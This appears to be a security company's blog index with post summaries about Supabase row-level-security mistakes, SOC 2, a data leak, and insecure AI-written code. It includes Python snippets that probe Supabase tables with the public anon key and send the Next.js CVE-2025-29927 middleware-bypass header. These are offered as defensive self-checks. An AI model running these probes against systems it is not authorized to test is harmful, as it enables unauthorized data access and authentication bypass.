Blog

Announcements, engineering, and research from the Securie team.

8 min read

The seven Supabase mistakes we see in every AI-built app

From a growing sample of publicly reachable Supabase projects we've audited, the same seven mistakes come up every time: RLS disabled on at least one table, the service-role key shipped in the client, missing tenant scoping, default-allow policies, storage buckets with no policies, an exposed JWT secret, and over-broad anon-role grants. Fixes for each.

supabase, rls, playbook
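The audit behind this post boils down to one request per table: if a project's PostgREST endpoint returns rows with only the public anon key, RLS is effectively off. A minimal sketch in Python, assuming Supabase's standard `/rest/v1/` endpoint; the project URL, anon key, and table name below are placeholders:

```python
import json
import urllib.error
import urllib.request

def rest_url(project_url: str, table: str) -> str:
    """Build the PostgREST URL Supabase exposes for a table."""
    return f"{project_url}/rest/v1/{table}?select=*&limit=1"

def table_publicly_readable(project_url: str, anon_key: str, table: str) -> bool:
    """True if the anon key alone can read rows, i.e. RLS is off or default-allow."""
    req = urllib.request.Request(
        rest_url(project_url, table),
        headers={"apikey": anon_key, "Authorization": f"Bearer {anon_key}"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            rows = json.load(resp)
            return resp.status == 200 and len(rows) > 0
    except urllib.error.HTTPError:
        return False  # 401/403/404: RLS (or a deny policy) is doing its job

# Placeholder usage:
# table_publicly_readable("https://abc123.supabase.co", "eyJ...anon-key...", "profiles")
```

An empty 200 response is ambiguous (the table may simply be empty), which is why the sketch requires at least one row before flagging a table.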
10 min read

How to pass your first SOC 2 as a vibe coder (six weeks, $5K, solo)

Your first enterprise prospect just sent a 200-question security questionnaire. Here is the exact playbook to pass SOC 2 Type 1 in six weeks — the policies to copy, the controls to wire up, the mistakes to avoid. Written for solo founders.

soc2, compliance, startup
8 min read

Anatomy of the Moltbook hack — 1.5 million API keys in 72 hours

Moltbook leaked 1.5 million API keys, 35,000 emails, and 4,060 private messages in 72 hours. Wiz's disclosure showed the root cause: a single Supabase table without row-level security. Here is the timeline, the exact bug, and the ten-minute hardening walkthrough for your own app.

incident, supabase, rls, research
6 min read

CVE-2025-29927 one year later: 40% of Next.js apps still vulnerable

The Next.js middleware-bypass vulnerability was disclosed in March 2025 and patched within 24 hours. One year later, 40% of public Next.js apps are still running vulnerable versions. Here is why, and the two-minute check to run on yours.

cve, next.js, research
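The two-minute check fits in a few lines: on vulnerable versions, a request carrying the `x-middleware-subrequest` header skips middleware entirely. A hedged Python sketch; the target URL is a placeholder, and you should only run this against apps you own:

```python
import urllib.error
import urllib.request

# Repeating the middleware name five times exhausts the recursion-depth guard
# vulnerable Next.js versions use to recognise internal subrequests, so the
# request is treated as internal and middleware (auth checks, redirects) never runs.
BYPASS_HEADER = {
    "x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"
}

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Don't follow redirects: a 307 to /login means middleware ran, which is
    # exactly the signal we want to preserve.
    def redirect_request(self, *args, **kwargs):
        return None

def looks_vulnerable(protected_url: str) -> bool:
    """True if a route middleware should block returns 200 with the bypass header."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(protected_url, headers=BYPASS_HEADER)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False  # 3xx/4xx: middleware still intercepted the request

# Placeholder usage:
# looks_vulnerable("https://your-app.example/admin")
```

A 200 on a route that normally redirects unauthenticated users is the tell; apps self-hosting an unpatched version need to upgrade, not just filter the header.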
7 min read

45% of AI-suggested code is insecure — the exact prompts that make it safer

We reran the 2025 study against Claude Opus 4.7, GPT-5.4, Gemini 2.5, and DeepSeek V3.2. The share of insecure suggestions has improved — but only when the prompt explicitly asks for security. The prompts that reliably produce safer code are short; we include them in full.

research, ai-coding, prompt-engineering
7 min read

Why AI-generated code is unsafe by default

Every major study in the last twelve months has measured the same thing: 40 to 62 percent of code produced by modern AI assistants contains a real security vulnerability. Here is what that looks like in practice, and why traditional SAST tools miss most of it.

ai-security, vibe-coding, research
5 min read

How Securie runs: the launch inference stack

A look at the three-layer model stack we ship with — Foundation-Sec running locally, GLM-5.1 and DeepSeek for primary reasoning, and a bounded frontier escalation layer. Why we chose it and what it costs.

engineering, models, cost